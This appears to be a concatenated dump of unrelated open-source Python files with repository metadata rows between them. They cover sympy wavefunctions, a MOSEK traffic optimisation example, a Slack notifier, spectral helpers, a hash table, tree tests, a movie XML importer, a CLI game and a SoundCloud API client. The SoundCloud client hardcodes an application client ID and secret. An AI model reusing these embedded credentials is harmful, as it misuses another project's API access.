return Wavefunction(conjugate(self.expr), *self.args[1:])
def _eval_transpose(self):
return self
@property
def free_symbols(self):
return self.expr.free_symbols
@property
def is_commutative(self):
"""
Override Function's is_commutative so that order is preserved in
represented expressions
"""
return False
@classmethod
def eval(self, *args):
return None
@property
def variables(self):
"""
Return the coordinates which the wavefunction depends on
Examples
========
>>> from sympy.physics.quantum.state import Wavefunction
>>> from sympy import symbols
>>> x,y = symbols('x,y')
>>> f = Wavefunction(x*y, x, y)
>>> f.variables
(x, y)
>>> g = Wavefunction(x*y, x)
>>> g.variables
(x,)
"""
var = [g[0] if isinstance(g, Tuple) else g for g in self._args[1:]]
return tuple(var)
@property
def limits(self):
"""
Return the limits of the coordinates which the w.f. depends on If no
limits are specified, defaults to ``(-oo, oo)``.
Examples
========
>>> from sympy.physics.quantum.state import Wavefunction
>>> from sympy import symbols
>>> x, y = symbols('x, y')
>>> f = Wavefunction(x**2, (x, 0, 1))
>>> f.limits
{x: (0, 1)}
>>> f = Wavefunction(x**2, x)
>>> f.limits
{x: (-oo, oo)}
>>> f = Wavefunction(x**2 + y**2, x, (y, -1, 2))
>>> f.limits
{x: (-oo, oo), y: (-1, 2)}
"""
limits = [(g[1], g[2]) if isinstance(g, Tuple) else (-oo, oo)
for g in self._args[1:]]
return dict(zip(self.variables, tuple(limits)))
@property
def expr(self):
"""
Return the expression which is the functional form of the Wavefunction
Examples
========
>>> from sympy.physics.quantum.state import Wavefunction
>>> from sympy import symbols
>>> x, y = symbols('x, y')
>>> f = Wavefunction(x**2, x)
>>> f.expr
x**2
"""
return self._args[0]
@property
def is_normalized(self):
"""
Returns true if the Wavefunction is properly normalized
Examples
========
>>> from sympy import symbols, pi
>>> from sympy.functions import sqrt, sin
>>> from sympy.physics.quantum.state import Wavefunction
>>> x, L = symbols('x,L', positive=True)
>>> n = symbols('n', integer=True)
>>> g = sqrt(2/L)*sin(n*pi*x/L)
>>> f = Wavefunction(g, (x, 0, L))
>>> f.is_normalized
True
"""
return (self.norm == 1.0)
@property
@cacheit
def norm(self):
"""
Return the normalization of the specified functional form.
This function integrates over the coordinates of the Wavefunction, with
the bounds specified.
Examples
========
>>> from sympy import symbols, pi
>>> from sympy.functions import sqrt, sin
>>> from sympy.physics.quantum.state import Wavefunction
>>> x, L = symbols('x,L', positive=True)
>>> n = symbols('n', integer=True)
>>> g = sqrt(2/L)*sin(n*pi*x/L)
>>> f = Wavefunction(g, (x, 0, L))
>>> f.norm
1
>>> g = sin(n*pi*x/L)
>>> f = Wavefunction(g, (x, 0, L))
>>> f.norm
sqrt(2)*sqrt(L)/2
"""
exp = self.expr*conjugate(self.expr)
var = self.variables
limits = self.limits
for v in var:
curr_limits = limits[v]
exp = integrate(exp, (v, curr_limits[0], curr_limits[1]))
return sqrt(exp)
def normalize(self):
"""
Return a normalized version of the Wavefunction
Examples
========
>>> from sympy import symbols, pi
>>> from sympy.functions import sqrt, sin
>>> from sympy.physics.quantum.state import Wavefunction
>>> x, L = symbols('x,L', real=True)
>>> n = symbols('n', integer=True)
>>> g = sin(n*pi*x/L)
>>> f = Wavefunction(g, (x, 0, L))
>>> f.normalize()
Wavefunction(sqrt(2)*sin(pi*n*x/L)/sqrt(L), (x, 0, L))
"""
const = self.norm
if const == oo:
raise NotImplementedError("The function is not normalizable!")
else:
return Wavefunction((const)**(-1)*self.expr, *self.args[1:])
def prob(self):
"""
Return the absolute magnitude of the w.f., `|\psi(x)|^2`
Examples
========
>>> from sympy import symbols, pi
>>> from sympy.functions import sqrt, sin
>>> from sympy.physics.quantum.state import Wavefunction
>>> x, L = symbols('x,L', real=True)
>>> n = symbols('n', integer=True)
>>> g = sin(n*pi*x/L)
>>> f = Wavefunction(g, (x, 0, L))
>>> f.prob()
Wavefunction(sin(pi*n*x/L)**2, x)
"""
return Wavefunction(self.expr*conjugate(self.expr), *self.variables)
|
bsd-3-clause
| 1,310,228,906,220,686,800
| 29.209474
| 106
| 0.545245
| false
| 4.150853
| false
| false
| false
|
edljk/Mosek.jl
|
deps/src/mosek/7/tools/examples/fusion/python/TrafficNetworkModel.py
|
1
|
4935
|
#
# Copyright: Copyright (c) MOSEK ApS, Denmark. All rights reserved.
#
# File: TrafficNetworkModel.py
#
# Purpose: Demonstrates a traffix network problem as a conic quadratic problem.
#
# Source: Robert Fourer, "Convexity Checking in Large-Scale Optimization",
# OR 53 --- Nottingham 6-8 September 2011.
#
# The problem:
# Given a directed graph representing a traffic network
# with one source and one sink, we have for each arc an
# associated capacity, base travel time and a
# sensitivity. Travel time along a specific arc increases
# as the flow approaches the capacity.
#
# Given a fixed inflow we now wish to find the
# configuration that minimizes the average travel time.
from mosek.fusion import *
import sys
class TrafficNetworkError(Exception): pass
class TrafficNetworkModel(Model):
def __init__(self,
numberOfNodes,
source_idx,
sink_idx,
arc_i,
arc_j,
arcSensitivity,
arcCapacity,
arcBaseTravelTime,
T):
Model.__init__(self,"Traffic Network")
finished = False
try:
n = numberOfNodes
narcs = len(arc_i)
NxN = NDSet(n, n)
sens = Matrix.sparse(n, n, arc_i, arc_j, arcSensitivity)
cap = Matrix.sparse(n, n, arc_i, arc_j, arcCapacity)
basetime = Matrix.sparse(n, n, arc_i, arc_j, arcBaseTravelTime)
e = Matrix.sparse(n, n, arc_i, arc_j, [ 1.0 ] * narcs)
e_e = Matrix.sparse(n,n, [ sink_idx ],[ source_idx ], [ 1.0 ]);
cs_inv_matrix = \
Matrix.sparse(n, n, arc_i, arc_j,
[ 1.0 / (arcSensitivity[i] * arcCapacity[i]) for i in range(narcs)])
s_inv_matrix = \
Matrix.sparse(n, n, arc_i, arc_j,
[ 1.0 / arcSensitivity[i] for i in range(narcs)])
self.__flow = self.variable("traffic_flow", NxN, Domain.greaterThan(0.0))
x = self.__flow;
t = self.variable("travel_time" , NxN, Domain.greaterThan(0.0))
d = self.variable("d", NxN, Domain.greaterThan(0.0))
z = self.variable("z", NxN, Domain.greaterThan(0.0))
# Set the objective:
self.objective("Average travel time",
ObjectiveSense.Minimize,
Expr.mul(1.0/T, Expr.add(Expr.dot(basetime,x), Expr.dot(e,d))))
# Set up constraints
# Constraint (1a)
numnz = len(arcSensitivity)
v = Variable.stack([ [ d.index(arc_i[i],arc_j[i]),
z.index(arc_i[i],arc_j[i]),
x.index(arc_i[i],arc_j[i]) ] for i in range(narcs) ])
self.constraint("(1a)",v, Domain.inRotatedQCone(narcs,3))
# Constraint (1b)
self.constraint("(1b)",
Expr.sub(Expr.add(Expr.mulElm(z,e),
Expr.mulElm(x,cs_inv_matrix)),
s_inv_matrix),
Domain.equalsTo(0.0))
# Constraint (2)
self.constraint("(2)",
Expr.sub(Expr.add(Expr.mulDiag(x, e.transpose()),
Expr.mulDiag(x, e_e.transpose())),
Expr.add(Expr.mulDiag(x.transpose(), e),
Expr.mulDiag(x.transpose(), e_e))),
Domain.equalsTo(0.0))
# Constraint (3)
self.constraint("(3)",x.index(sink_idx, source_idx), Domain.equalsTo(T))
finished = True
finally:
if not finished:
self.__del__()
# Return the solution. We do this the easy and inefficeint way:
# We fetch the whole NxN array og values, a lot of which are
# zeros.
def getFlow(self):
return self.__flow.level()
def main(args):
n = 4
arc_i = [ 0, 0, 2, 1, 2 ]
arc_j = [ 1, 2, 1, 3, 3 ]
arc_base = [ 4.0, 1.0, 2.0, 1.0, 6.0 ]
arc_cap = [ 10.0, 12.0, 20.0, 15.0, 10.0 ]
arc_sens = [ 0.1, 0.7, 0.9, 0.5, 0.1 ]
T = 20.0
source_idx = 0
sink_idx = 3
with TrafficNetworkModel(n, source_idx, sink_idx,
arc_i, arc_j,
arc_sens,
arc_cap,
arc_base,
T) as M:
M.solve()
flow = M.getFlow()
print("Optimal flow:")
for i,j in zip(arc_i,arc_j):
print "\tflow node%d->node%d = %f" % (i,j, flow[i * n + j])
main(sys.argv[1:])
|
mit
| 7,939,681,877,127,627,000
| 35.286765
| 94
| 0.473759
| false
| 3.537634
| false
| false
| false
|
eahrold/SysOps
|
observy/notifications/SlackNotification.py
|
1
|
1532
|
#!/usr/bin/env python
import subprocess
import json
import urllib2, urllib
from notifications import HookableNotifications
class SlackNotification(HookableNotifications):
"""Slack Notification class"""
_webhook_service_name = 'slack'
def __init__(self, errors):
super(SlackNotification, self).__init__(errors)
def send(self):
print "Sening slack notifications"
for error in self.errors:
message = error['message']
status_code = error['status_code']
icon_emoji = ":fire_engine:" if status_code is 3 else ":fire:"
username = "server-notice" if status_code is 3 else "server-alert"
host_info = self.host_info()
full_message = "Alert from %s: %s at %s" % (host_info['host'],
message,
self.timestamp()
)
payload={
"text": full_message,
"icon_emoji": icon_emoji,
"username": username,
}
data = urllib.urlencode(payload)
for webhook in self.webhooks():
try:
req = urllib2.Request(webhook)
req.add_header('Content-Type', 'application/json')
response = urllib2.urlopen(req, json.dumps(payload))
except Exception as e:
pass
|
mit
| 8,007,633,411,876,338,000
| 31.595745
| 78
| 0.490862
| false
| 4.990228
| false
| false
| false
|
Delosari/dazer
|
bin/lib/ssp_functions/ssp_Hector_Fit3D_my.py
|
1
|
2446
|
#!/usr/bin/python
import sys
import numpy as np
from numpy import float_
from numpy import absolute as abs
from numpy import random as ran
import matplotlib
from scipy.signal.signaltools import convolve2d
from scipy.interpolate.interpolate import interp1d
def A_l(Rv,l):
l=l/10000.; #Amstrongs to Microns
x=1/l
if x > 1.1:
y=(x-1.82)
ax=1+0.17699*y-0.50447*y**2-0.02427*y**3+0.72085*y**4+0.01979*y**5-0.77530*y**6+0.32999*y**7
bx=1.41338*y+2.28305*y**2+1.07233*y**3-5.38434*y**4-0.62251*y**5+5.30260*y**6-2.09002*y**7
else:
ax=0.574*x**1.61
bx=-0.527*x**1.61
Arat=ax+bx/Rv
return Arat
def median_filter(box,arra):
if box == 2*int(box/2.):
box=box+1
val=arra
# print val.shape,box
for i in range(box, (len(val)+1-box)):
tmp=np.zeros(2*box)
for jk in range(0, 2*box):
tmp[jk]=arra[i-box+jk]
val[i]=np.median(tmp)
for i in range(1, box):
effec_box=i
tmp=np.zeros(2*effec_box)
for jk in range(0, 2*effec_box):
tmp[jk]=arra[i-effec_box+jk]
val[i]=np.median(tmp)
for i in range(len(val)+1-box, len(val)):
effec_box=len(val)-i+1
tmp=np.zeros(2*effec_box)
for jk in range(0, 2*effec_box):
tmp[jk]=arra[i-effec_box+jk-1]
val[i]=np.median(tmp)
val[0]=val[1]
return val
def median_box(box, arra):
if box == 2*int(box/2.):
box=box+1
in_val=arra
out_val=[]
k=0
for i in range(box, len(in_val)+1-box, 2*box):
tmp=np.zeros(2*box)
for j in range(0, 2*box):
tmp[j]=arra[i-box+j]
out_val.extend([np.median(tmp)])
out_val=np.array(out_val)
return out_val
def sycall(comand):
from subprocess import call
line=comand.split(" ")
fcomand=[]
fcomand.extend(line)
call(fcomand)
def stats(data):
out=np.zeros(7)
out[0]=np.mean(data)
out[1]=np.mean(data)+np.std(data)
out[2]=np.median(data)
out[3]=np.amin(data)
out[4]=np.amax(data)
out[5]=np.std(data)
out[6]=np.mean(data)+np.std(data)
return out
def mycall(comand, alias_py='python'):
from subprocess import call
line=comand.split(" ")
fcomand=[alias_py]#2.7']
fcomand.extend(line)
linp=''
nx=len(fcomand)
for i in range(1, nx):
linp=linp+fcomand[i]+" "
print linp
call(fcomand)
print "DONE"
|
mit
| 1,560,906,364,386,569,200
| 25.311828
| 100
| 0.572772
| false
| 2.521649
| false
| false
| false
|
KarlParkinson/practice
|
dataStructures/hashTable.py
|
1
|
2520
|
class HashTable:
def __init__(self, size):
self.size = size
self.keys = [None]*size
self.data = [None]*size
def put(self, key, data):
hashValue = self._hash(key)
if (self.keys[hashValue] == None):
# no collision, found empty slot, so insert
self.keys[hashValue] = key
self.data[hashValue] = data
elif (self.keys[hashValue] == key):
# no collision, found spot, replace old data
self.data[hashValue] = data
else:
hashValue = self._rehash(hashValue)
while (self.keys[hashValue] != None and self.keys[hashValue] != key and self.keys[hashValue] != 'deleted'):
hashValue = self._rehash(hashValue)
if (self.keys[hashValue] == None or self.keys[hashValue] == 'deleted'):
# found empty slot, insert data
self.keys[hashValue] = key
self.data[hashValue] = data
else:
# found slot, replace data
self.data[hashValue] = data
def get(self, key):
hashValue = self._hash(key)
found = False
stop = False
startPos = hashValue
while (self.keys[hashValue] != None and not found and not stop):
if (self.keys[hashValue] == key):
found = True
else:
hashValue = self._rehash(hashValue)
if (hashValue == startPos):
stop = True
if (found):
return self.data[hashValue]
else:
return None
def delete(self, key):
hashValue = self._hash(key)
found = False
stop = False
startPos = hashValue
while (self.keys[hashValue] != None and not found and not stop):
if (self.keys[hashValue] == key):
found = True
else:
hashValue = self._rehash(hashValue)
if (hashValue == startPos):
stop = True
if (found):
self.keys[hashValue] = 'deleted'
self.data[hashValue] = None
else:
return False
def _hash(self, key):
return key % self.size
def _rehash(self, hashValue):
return (hashValue+1) % self.size
h = HashTable(11)
h.put(1,3)
h.put(12,5)
h.put(23, 78)
print h.keys
h.delete(12)
print h.get(1)
print h.get(23)
print h.keys
h.put(34, 35)
print h.keys
print h.data
#h.put(5,6)
#h.put(7,9)
|
mit
| 2,377,790,933,382,312,000
| 27.965517
| 119
| 0.518651
| false
| 3.806647
| false
| false
| false
|
mbodenhamer/syn
|
syn/tree/b/tests/test_tree.py
|
1
|
8401
|
from operator import attrgetter
from nose.tools import assert_raises
from syn.tree.b import Tree, Node, TreeError, do_nothing, identity
from syn.base.b import check_idempotence, Attr
from syn.base_utils import get_typename
from syn.tree.b.tests.test_node import Tst2, tree_node_from_nested_list,\
tree_node_from_nested_list_types
#-------------------------------------------------------------------------------
# Tree
#-----------------------------------------------------------
# Tree Test 1
def tree_tst_1(treecls):
cls = treecls._attrs.types['root'].type
clsname = get_typename(cls)
n1 = cls(_name='n1', _id=0)
n2 = cls(_name='n2', _id=1)
n3 = cls(_name='n3', _id=2)
n4 = cls(_name='n4', _id=3)
n5 = cls(_name='n5', _id=4)
n6 = cls(_name='n6', _id=5)
n1.add_child(n2)
n1.add_child(n3)
assert list(n1.siblings()) == []
assert list(n2.siblings()) == [n3]
assert list(n3.siblings()) == [n2]
obj = treecls(n1)
check_idempotence(obj)
assert obj.nodes == [n1, n2, n3]
assert obj.node_types == [clsname]
assert obj.id_dict == {0: n1, 1: n2, 2: n3}
assert obj.type_dict == {clsname: [n1, n2, n3]}
assert_raises(TreeError, obj.add_node, n3)
assert_raises(TreeError, obj.add_node, n4, parent=n5)
obj.add_node(n4, parent=n3)
assert n4 in obj.nodes
assert n4 in n3._children
assert n4._parent is n3
assert_raises(TreeError, obj.add_node, n5, parent_id=100)
obj.add_node(n5, parent_id=1)
assert n5 in obj.nodes
assert n5 in n2._children
assert n5._parent is n2
obj.add_node(n6)
assert n6 in obj.nodes
assert n6 in n5._children
assert n6._parent is n5
assert obj.nodes == [n1, n2, n3, n4, n5, n6]
assert obj.node_types == [clsname]
assert obj.id_dict == {0: n1, 1: n2, 2: n3, 3:n4, 4:n5, 5:n6}
assert obj.type_dict == {clsname: [n1, n2, n3, n4, n5, n6]}
for _id,node in enumerate([n1, n2, n3, n4, n5, n6]):
assert obj.get_node_by_id(_id) == obj._get_node_by_id(_id)
assert obj.get_node_by_id(_id) == node
assert obj.get_node_by_id(100) is None
assert obj.get_node_by_id(-1) is None
assert_raises(TypeError, obj.depth_first, FooType = do_nothing)
assert_raises(TypeError, obj._check_search_kwarg_types,
{Tst2: do_nothing})
assert_raises(TypeError, obj._check_search_kwarg_types, {0: do_nothing})
assert list(n1.descendants()) == [n2, n5, n6, n3, n4]
accum = []
def collect(node):
accum.append(node._id)
obj.depth_first(collect)
assert accum == [0, 1, 4, 5, 2, 3]
accum = []
obj.depth_first(**{clsname: collect})
assert accum == [0, 1, 4, 5, 2, 3]
accum = []
obj.search_rootward(collect)
assert accum == [0]
accum = []
obj.search_rootward(**{'current_node': n5,
clsname: collect})
assert accum == [4, 1, 0]
def stop(node):
return node._id == 3
def get(node):
return node._name
assert obj.depth_first(stop_test = stop, _return = get) == 'n4'
assert obj.search_rootward(stop_test = stop, _return = get) is None
assert obj.search_rootward(current_node = n4, stop_test = stop,
_return = get) == 'n4'
assert obj.search_rootward(current_node = n6, stop_test = stop,
_return = get) is None
n7 = cls(_name='n7', _id=6)
n8 = cls(_name='n8', _id=7)
n7.add_child(n8)
obj.replace_node(n5, n7)
assert n2._children == [n7]
assert n7._parent is n2
assert n7._children == [n8]
assert n8._parent is n7
assert n5._children == [n6]
assert n6._parent is n5
assert n5._parent is None
assert obj.nodes == [n1, n2, n3, n4, n7, n8]
assert obj.node_types == [clsname]
assert obj.id_dict == {0: n1, 1: n2, 2: n3, 3:n4, 6:n7, 7:n8}
assert obj.type_dict == {clsname: [n1, n2, n3, n4, n7, n8]}
assert_raises(TreeError, obj.remove_node, n5)
assert_raises(TreeError, obj.replace_node, n5, n7)
obj.remove_node(n2)
assert n1._children == [n3]
assert n2._parent is None
assert n2._children == [n7]
assert n7._parent is n2
assert obj.nodes == [n1, n3, n4]
assert obj.node_types == [clsname]
assert obj.id_dict == {0: n1, 2: n3, 3:n4}
assert obj.type_dict == {clsname: [n1, n3, n4]}
assert_raises(TreeError, obj.replace_node, n1, n7)
assert_raises(TreeError, obj.replace_node, n3, n7)
obj.replace_node(n1, n2)
assert n1._children == [n3]
assert n3._parent is n1
assert obj.root is n2
assert obj.nodes == [n2, n7, n8]
assert obj.node_types == [clsname]
assert obj.id_dict == {1: n2, 6: n7, 7:n8}
assert obj.type_dict == {clsname: [n2, n7, n8]}
obj.rebuild()
assert obj.root is n2
assert obj.nodes == [n2, n7, n8]
assert obj.node_types == [clsname]
assert obj.id_dict == {1: n2, 6: n7, 7:n8}
assert obj.type_dict == {clsname: [n2, n7, n8]}
obj.remove_node(n2)
assert obj.root is None
assert obj.nodes == []
assert obj.node_types == []
assert obj.id_dict == {}
assert obj.type_dict == {}
#-----------------------------------------------------------
# Tree Test 2
def tree_tst_2(treecls):
from syn.base_utils import seq_list_nested
b = 3
d = 4 # 121 nodes
# d = 6 # 1093 nodes
# d = 7 # 3280 nodes
# d = 8 # Almost 10,000 nodes
lst, N = seq_list_nested(b, d, top_level=False)
root = tree_node_from_nested_list(lst[0], lst[1])
assert isinstance(root, Node)
tree1 = treecls(root)
base_id = 0
check_idempotence(tree1)
assert len(tree1.nodes) == N
assert tree1.node_types == ['Tst1',]
assert sorted(tree1.id_dict.keys()) == list(range(base_id,base_id + N))
assert list(tree1.type_dict.keys()) == ['Tst1']
assert sorted(tree1.type_dict['Tst1'], key=attrgetter('_id')) == \
sorted(tree1.nodes, key=attrgetter('_id'))
accum = []
def collect(node):
accum.append(node.value)
tree1.depth_first(collect)
assert sum(accum) == sum(range(1, N+1))
while tree1.root._children:
tree1.remove_node(tree1.root._children[0])
assert tree1.nodes == [tree1.root]
assert tree1.root._children == []
mod = 4
base_id = 0
sproot = tree_node_from_nested_list_types(lst[0], lst[1], mod)
tree2 = Tree(sproot)
assert len(tree2.nodes) == N
assert tree2.node_types == ['Tst1', 'Tst2']
assert sorted(tree2.id_dict.keys()) == list(range(base_id,base_id+N))
assert sorted(tree2.type_dict.keys()) == sorted(['Tst1', 'Tst2'])
assert sorted(tree2.type_dict['Tst1'] +
tree2.type_dict['Tst2'], key=attrgetter('_id')) == \
sorted(tree2.nodes, key=attrgetter('_id'))
accum = []
tree2.depth_first(collect)
assert sum(accum) == sum(range(1, N+1))
accum = []
tree2.depth_first(Tst2 = collect)
if N % mod != 0:
assert sum(accum) == sum(range(mod, N, mod))
#-----------------------------------------------------------
# Tree
def test_tree():
# Test that inequal roots mean inequal Trees
n1 = Node()
n2 = Node(_id=2)
t1 = Tree(n1)
t2 = Tree(n2)
assert n1 != n2
assert t1 != t2
t3 = Tree()
t3.validate()
assert t3 == t1
# In-depth tree tests
tree_tst_1(Tree) # basic tree operations
tree_tst_2(Tree) # test with a moderate/large number of nodes
# Miscellaneous tests
assert identity(5) == 5
n3 = Node(_id = 3)
t2.add_node(n3, parent=n2)
n3._parent = None
assert_raises(TreeError, t2.remove_node, n3)
assert_raises(TreeError, t2.replace_node, n3, n1)
#-------------------------------------------------------------------------------
# Test root node validation
rnv_accum = []
class Root1(Node):
def validate(self):
super(Root1, self).validate()
rnv_accum.append(1)
class RNVTree(Tree):
_attrs = dict(root = Attr(Root1))
def test_root_validation():
RNVTree(Root1())
assert sum(rnv_accum) == len(rnv_accum) == 1 # just a sanity check
#-------------------------------------------------------------------------------
if __name__ == '__main__': # pragma: no cover
from syn.base_utils import run_all_tests
run_all_tests(globals(), verbose=True, print_errors=False)
|
mit
| 5,143,387,071,253,162,000
| 27.770548
| 80
| 0.562195
| false
| 2.950825
| true
| false
| false
|
buzz/flicks
|
flicksapp/management/commands/import_amc_xml.py
|
1
|
6230
|
from datetime import datetime
import re
import elementtree.ElementTree as et
from django.core.management.base import BaseCommand
from flicksapp.models import Movie, Country, Person, Genre, File
imdb_regex = re.compile("http://.*imdb.com/title/tt0*(\d+)")
imdb_regex2 = re.compile("http://.*imdb.com/Title\?0*(\d+)")
def parse_imdb(f):
"""Parse imdb number out of imdb url. Skip field if not possible."""
global imdb_regex, imdb_regex2
r = imdb_regex.match(f)
try:
return int(r.groups()[0])
except AttributeError:
r = imdb_regex2.match(f)
return int(r.groups()[0])
class Command(BaseCommand):
args = '<FILE>'
help = 'Imports AMC XML file'
def handle(self, *args, **options):
# load xml file
try:
xml_doc = et.parse(args[0])
except IndexError:
self.stdout.write('No file given\n')
return
except IOError:
self.stdout.write("Could not open file: %s" % args[0])
return
# add movies
movies = xml_doc.findall("//Movie")
for i, movie in enumerate(movies):
a = movie.attrib
# keep track of imported fields
fields = {}
new_movie = Movie()
try:
new_movie.id = int(a["Number"])
new_movie.title = a["OriginalTitle"].strip()
except KeyError:
self.stdout.write(
"Panic! Could not extract Number nor OriginalTitle." +
"Skipping title: %s\n" % a)
continue
new_movie.save() # or relations cannot be assigned
# if we can extract imdb id we leave most other fields
# empty that can be filled by imdb
try:
url = a["URL"]
new_movie.imdb_id = parse_imdb(url)
fields['imdb_id'] = True
except (KeyError, AttributeError):
# if imdb id is not present we need to copy other
# fields
fields['imdb_id'] = False
if url and len(url) > 2:
new_movie.notes = "URL: %s\n" % url.strip()
fields['notes'] = True
# director
try:
director_name = a["Director"].strip()
try:
p = Person.objects.get(name=director_name)
except Person.DoesNotExist:
# ok we have to fill imdb person ourselves in some cases
if director_name == 'David Lynch':
imdb_id = 186
elif director_name == 'Carsten Walter':
imdb_id = None
elif director_name == 'Roger Sommer':
imdb_id = None
elif director_name == 'Dieter Rhode':
imdb_id = None
else:
raise Exception(
"Panic! Manually assign imdb id for person " +
"'%s' (%s)\n" %
(director_name, new_movie.title))
p = Person(imdb_id=imdb_id, name=director_name)
p.save()
new_movie.directors.add(p)
fields['directors'] = True
except KeyError:
fields['directors'] = False
# country
try:
country_name = a["Country"].strip()
c, created = Country.objects.get_or_create(
name=country_name)
c.save()
new_movie.countries.add(c)
fields['countries'] = True
except KeyError:
fields['countries'] = False
# category
try:
genre_name = a["Category"].strip()
g, created = Genre.objects.get_or_create(
name=genre_name)
g.save()
new_movie.genres.add(g)
fields['genres'] = True
except KeyError:
fields['genres'] = False
# year
try:
new_movie.year = int(a["Year"].strip())
fields['year'] = True
except (KeyError, ValueError):
fields['year'] = False
# runtime
try:
new_movie.runtime = int(a["Length"].strip())
fields['runtime'] = True
except (KeyError, ValueError):
fields['runtime'] = False
# plot (description)
try:
new_movie.plot = a["Description"].strip()
fields['plot'] = True
except (KeyError, ValueError):
fields['plot'] = False
# always import non-imdb fields
# seen (checked)
try:
checked = a["Checked"]
if checked == 'True':
seen = True
elif checked == 'False':
seen = False
else:
raise ValueError()
new_movie.seen = seen
fields['seen'] = True
except (KeyError, ValueError):
fields['seen'] = False
# date added
try:
new_movie.added_on = datetime.strptime(a["Date"], '%m/%d/%Y')
fields['added_on'] = True
except (KeyError, ValueError):
fields['added_on'] = False
# finally save movie
new_movie.save()
# log import
imported = ' '.join([f for f in fields.keys() if fields[f]])
not_imported = ' '.join(
[('-%s' % f) for f in fields.keys() if not fields[f]])
self.stdout.write(
"Imported '%s' (%s %s)\n" %
(new_movie.title, imported, not_imported))
|
gpl-2.0
| 6,874,207,777,880,569,000
| 37.9375
| 80
| 0.440931
| false
| 4.803392
| false
| false
| false
|
telerainbow/randgame
|
randgame.py
|
1
|
3031
|
import random, cmd, sys
class randgame(cmd.Cmd):
intro = "this is randgame"
prompt = "randgame # "
players = ["asdf", "foo"]
turn = 0
rounds = 0
active = False
settings = {"no_two" : 0, "voice" : 0}
def do_f(self, arg):
print self.last_player
def do_set(self, arg):
'set settings. see \"list settings\" for available options'
if arg == "" or len(arg.split()) != 2:
print "*** syntax: set <key> <value>, where value may be 0 or 1"
return
setting, value = arg.split()
if setting not in self.settings.keys():
print '*** unrecognized setting. available settings: {0}'.format(", ".join(self.settings.keys()))
return
if value not in ['0', '1']:
print "*** value must be 0 or 1"
return
self.settings[setting] = int(value)
def do_start(self, arg):
'starts the game'
if self.active == False:
print "Game Started! glhf"
self.active = True
self.shuffle()
self.do_next(1)
else:
print "*** Game already started! use \"next\" instead"
def do_next(self, arg):
'shows next player'
if self.active == False :
print "*** No active game, use \"start\" first"
return
print "#"*50
print
print "{0} Player is {1}".format(("First" if arg==1 else "Next"), self.players[self.turn])
print
print "#"*50
self.turn += 1
if self.turn == len(self.players):
self.turn = 0
self.shuffle()
self.rounds += 1
def do_end(self, arg):
'ends current game (but does not exit)'
if self.active != True:
print "*** no active game!"
return
self.turn = 0
self.active = False
print "game ended after {0} rounds!".format(self.rounds)
self.rounds = 0
def shuffle(self):
if self.settings["no_two"] == 0 :
random.shuffle(self.players)
else:
last_player = self.players.pop()
random.shuffle(self.players)
self.players.insert( random.randint(1,len(self.players)), last_player)
def do_addplayer(self, arg):
'add a player to the game'
if self.active == True:
print "*** can't add player during active game"
return
if arg != "":
if arg not in self.players:
self.players.append(arg)
else:
print "*** player already added, please specify a different name"
else:
print "*** please specify a name"
def do_remove(self, arg):
'remove a player from the game'
if self.active == True:
print "*** can't remove player during game"
return
try:
self.players.remove(arg)
print "removed player {0} from game".format(arg)
except ValueError:
print "*** player not in game (check spelling?)"
def do_list(self, arg):
'list settings or list players'
if arg == "settings":
print "settings: "
for key in self.settings:
print "\t{0}\t{1}".format(key, self.settings[key])
elif arg == "players":
print ", ".join(map(str, self.players))
else:
print "*** \"list settings\" or \"list players\""
def do_q(self, arg):
'exit the program'
return True
def do_exit(self, arg):
'exit the program'
return True
if __name__ == '__main__':
randgame().cmdloop()
|
gpl-2.0
| 6,003,976,552,822,596,000
| 23.642276
| 100
| 0.626196
| false
| 3.003964
| false
| false
| false
|
Meriipu/quodlibet
|
quodlibet/browsers/soundcloud/api.py
|
1
|
10780
|
# Copyright 2016 Nick Boultbee
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
from datetime import datetime
from urllib.parse import urlencode
from gi.repository import GObject, Gio, Soup
from quodlibet import util, config
from quodlibet.util import website
from quodlibet.util.dprint import print_w, print_d
from quodlibet.util.http import download_json, download
from .library import SoundcloudFile
from .util import json_callback, Wrapper, sanitise_tag, DEFAULT_BITRATE, EPOCH
class RestApi(GObject.Object):
"""Semi-generic REST API client, using libsoup / `http.py`"""
def __init__(self, root):
super().__init__()
self._cancellable = Gio.Cancellable.new()
self.root = root
def _default_params(self):
return {}
def _get(self, path, callback, **kwargs):
args = self._default_params()
args.update(kwargs)
msg = Soup.Message.new('GET', self._url(path, args))
download_json(msg, self._cancellable, callback, None)
def _post(self, path, callback, **kwargs):
args = self._default_params()
args.update(kwargs)
msg = Soup.Message.new('POST', self._url(path))
post_body = urlencode(args)
if not isinstance(post_body, bytes):
post_body = post_body.encode("ascii")
msg.set_request('application/x-www-form-urlencoded',
Soup.MemoryUse.COPY, post_body)
download_json(msg, self._cancellable, callback, None)
def _put(self, path, callback, **kwargs):
args = self._default_params()
args.update(kwargs)
msg = Soup.Message.new('PUT', self._url(path))
body = urlencode(args)
if not isinstance(body, bytes):
body = body.encode("ascii")
msg.set_request('application/x-www-form-urlencoded',
Soup.MemoryUse.COPY, body)
download_json(msg, self._cancellable, callback, None)
def _delete(self, path, callback, **kwargs):
args = self._default_params()
args.update(kwargs)
# Turns out the SC API doesn't mind body arguments for DELETEs,
# and as it's neater and slightly more secure, let's do that.
body = urlencode(args)
if not isinstance(body, bytes):
body = body.encode("ascii")
msg = Soup.Message.new('DELETE', self._url(path))
msg.set_request('application/x-www-form-urlencoded',
Soup.MemoryUse.COPY, body)
download(msg, self._cancellable, callback, None, try_decode=True)
def _url(self, path, args=None):
path = "%s%s" % (self.root, path)
return "%s?%s" % (path, urlencode(args)) if args else path
class SoundcloudApiClient(RestApi):
__CLIENT_SECRET = 'ca2b69301bd1f73985a9b47224a2a239'
__CLIENT_ID = '5acc74891941cfc73ec8ee2504be6617'
API_ROOT = "https://api.soundcloud.com"
REDIRECT_URI = 'https://quodlibet.github.io/callbacks/soundcloud.html'
PAGE_SIZE = 150
MIN_DURATION_SECS = 120
COUNT_TAGS = {'%s_count' % t
for t in ('playback', 'download', 'likes', 'favoritings',
'download', 'comments')}
__gsignals__ = {
'fetch-success': (GObject.SignalFlags.RUN_LAST, None, (object,)),
'fetch-failure': (GObject.SignalFlags.RUN_LAST, None, (object,)),
'songs-received': (GObject.SignalFlags.RUN_LAST, None, (object,)),
'comments-received': (GObject.SignalFlags.RUN_LAST, None,
(int, object,)),
'authenticated': (GObject.SignalFlags.RUN_LAST, None, (object,)),
}
def __init__(self):
print_d("Starting Soundcloud API...")
